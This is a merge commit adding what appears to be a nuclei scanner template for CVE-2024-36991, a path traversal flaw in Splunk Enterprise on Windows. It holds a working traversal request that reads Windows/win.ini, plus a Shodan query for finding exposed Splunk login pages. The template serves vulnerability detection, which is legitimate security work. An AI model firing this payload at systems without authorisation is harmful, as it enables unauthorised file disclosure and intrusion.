Merge pull request #10215 from projectdiscovery/CVE-2024-36991

Create CVE-2024-36991.yaml (Splunk Enterprise - Local File Inclusion)

http/cves/2024/CVE-2024-36991.yaml

@@ -0,0 +1,48 @@
+id: CVE-2024-36991
+
+info:
+  name: Splunk Enterprise - Local File Inclusion
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.
+  reference:
+    - https://x.com/sheikhrishad0/status/1809210005125746880/photo/1
+    - https://x.com/chybeta/status/1809249794122215557/photo/1
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-36991
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"Login | Splunk"
+  tags: cve,cve2024,splunk,lfi
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /en-US/login HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "Splunk Inc.")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and